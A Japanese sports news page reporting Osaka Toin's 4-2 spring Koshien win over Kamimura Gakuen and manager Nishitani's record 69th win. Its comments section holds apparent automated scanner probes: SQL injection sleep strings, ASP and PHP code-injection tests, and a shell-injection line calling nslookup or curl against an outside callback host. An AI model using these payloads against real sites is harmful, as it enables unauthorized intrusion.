試合レポート

大阪桐蔭が3年連続8強、西谷監督は歴代勝利数単独トップの69勝、神村学園・正林は敗戦にも猛打賞

2024.03.27


中野大虎、徳丸快晴、森陽樹(ともに大阪桐蔭)※写真は過去の取材より

<第96回選抜高校野球大会:大阪桐蔭4ー2神村学園>◇27日◇2回戦◇甲子園

大阪桐蔭(大阪)が神村学園(鹿児島)に勝利して、3年連続のベスト8進出を決めた。

先発の森 陽樹投手(2年)がセンバツ初登板で4回2安打1失点に抑えると、5回からは中野 大虎投手(2年)が5回を2安打1失点。2年生のリレーで、昨年夏4強のメンバーが多く残る神村学園打線を封じた。森陽はそれでも「甲子園のマウンドで、魅せてやるという気持ちが強くて力んでしまった。自分はもっとできると思います」と満足せずに次戦での本領発揮を誓った。

3回に2点適時三塁打をマークした徳丸 快晴外野手(3年)は「左投手が多いチームでしたが、自分の打撃ができた。打ったあとの打席の内容が良くなかったので、修正したい」と話せば、1安打を含む強烈な打撃で甲子園を沸かせたラマル ギービン ラタナヤケ内野手(3年)も「また欲が出てしまった。ヒットの延長がホームランという心境でいきたい。次の試合では自分の形を意識していきたい」と、現状に満足せず、準々決勝でのさらなる活躍を誓っていた。

西谷監督は春夏通算で甲子園69勝目。68勝で並んでいた元智辯和歌山(和歌山)監督の高嶋 仁氏を抜いて、歴代単独トップとなった。西谷監督は「私どうこうの勝ち星ではなく、ここまでの勝利というのは、これまでの偉大な大阪桐蔭OBたちが築き上げた数字だと思います」と謙虚な姿勢は崩さなかった。

神村学園は9回にも1点を奪って2点差まで詰め寄ったが、粘りは届かなかった。初戦で本塁打をマークしていた正林 輝大外野手(3年)は4打数3安打1打点の活躍。「単打や長打のどちらも打てて良かった。速球投手については去年の仙台育英(宮城)で150キロの投手を見ているんで、慣れている。打撃は自信になったので、走塁、守備を磨いていきたい」と夏へのさらなる成長を目指す。

<関連記事はこちら>
◆【トーナメント表】センバツ7日目までの結果
◆【一覧】‘24年センバツ出場監督勝利数ランキング!
◆【センバツ出場校ランキング】勝利数は大阪桐蔭・西谷監督がダントツ、あと2勝で歴代最多勝利監督に
◆大阪桐蔭卒業生の進路も圧倒的! 14人が東京六大学、東都など強豪・名門大学進学! 2年連続ドライチも輩出
◆大阪桐蔭151キロ右腕に創志学園二枚看板の一角、高1時に145キロの怪腕……センバツ初戦未登板の逸材投手4人!
◆【センバツドラフト候補・注目野手編】ラマル、正林など大会を盛り上げる8人のスラッガーたち!

 

この記事の執筆者: 浦田 由紀夫

関連記事

9 Comments

  1. 1

    2024-03-27 at 11:22 PM

    1

  2. 1

    2024-03-28 at 12:27 AM

    response.write(9446736*9607469)

  3. 1

    2024-03-28 at 12:27 AM

    1′”

  4. ";print(md5(31337));$a="

    2024-03-28 at 12:27 AM

    1

  5. (nslookup -q=cname hitbasffigbac98b9c.bxss.me||curl hitbasffigbac98b9c.bxss.me))

    2024-03-28 at 12:28 AM

    1

  6. 1*if(now()=sysdate(),sleep(15),0)

    2024-03-28 at 12:29 AM

    1

  7. 1-1 OR 867=(SELECT 867 FROM PG_SLEEP(15))--

    2024-03-28 at 12:29 AM

    1

  8. @@t3qSb

    2024-03-28 at 12:29 AM

    1

  9. 1

    2024-03-28 at 12:30 AM

    ‘”

応援メッセージを投稿

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

RANKING

人気記事

2024.04.06

【茨城】竜ヶ崎一が取手二と初戦で対戦<春季県大会地区予選組み合わせ>

2024.04.06

髙尾響(広陵)の147キロ!新星・高橋(北照)が自己最速146キロをマーク!【高校日本代表一次候補 参加投手球速一覧】

2024.04.06

【愛知】誠信が優勝、県大会の出場校が出揃う<春季尾張地区予選結果>

2024.04.06

【春季愛媛大会】松山商が攻守につなぐ野球で66年ぶり秋春連覇! 第1シードの夏23年ぶり制覇へ「時は来た!」

2024.04.06

【春季東京都大会】高橋の2ランで先制した関東一が、駒大高の追撃をかわして3回戦進出

2024.04.02

【大学野球部24年度新入生一覧】甲子園のスター、ドラフト候補、プロを選ばなかった高校日本代表はどの大学に入った?

2024.04.02

【東京】日大三、堀越がコールド発進、駒大高はサヨナラ勝ち<春季都大会>

2024.04.02

【全国各地区春季大会組み合わせ一覧】新戦力が台頭するチームはどこだ!? 新基準バットの及ぼす影響は?

2024.04.03

【東京】帝京が12得点のコールド発進<春季都大会>

2024.04.05

U-18代表候補合宿に”新星”現れる!中学まで無名だった 高橋幸佑(北照)が圧巻のストレート「紅白戦は全部真っ直ぐで三振を狙います」

2024.04.02

【大学野球部24年度新入生一覧】甲子園のスター、ドラフト候補、プロを選ばなかった高校日本代表はどの大学に入った?

2024.03.17

【東京】帝京はコールド発進 東亜学園も44得点の快勝<春季都大会1次予選>

2024.03.11

立教大が卒業生の進路を発表!智弁和歌山出身のエースは三菱重工Eastへ、明石商出身のスラッガーは証券マンに!

2024.04.02

【東京】日大三、堀越がコールド発進、駒大高はサヨナラ勝ち<春季都大会>

2024.04.02

【全国各地区春季大会組み合わせ一覧】新戦力が台頭するチームはどこだ!? 新基準バットの及ぼす影響は?